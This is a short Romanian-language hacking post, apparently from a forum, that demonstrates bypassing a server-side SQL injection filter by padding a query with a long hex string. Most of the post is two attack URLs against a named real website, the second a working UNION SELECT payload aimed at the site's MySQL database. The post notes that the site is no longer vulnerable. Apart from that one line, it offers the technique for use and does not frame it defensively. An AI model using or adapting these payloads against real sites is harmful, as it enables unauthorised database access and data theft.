SQL Injection filter bypass using Buffer Overflow

[ZeroCold]

Acesta este un exemplu despre cum se poate evita filtru aplicat de server împotriva SQLi.

Cererea este blocat? de c?tre filtru:

http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 2) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

zoom

Cererea trece de filtru ?i este executata de MySQL:

http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

zoom

##########################

Site-ul dat ca exemplu numai este vulnerabil.

Credite: tdxev

Sursa: aici.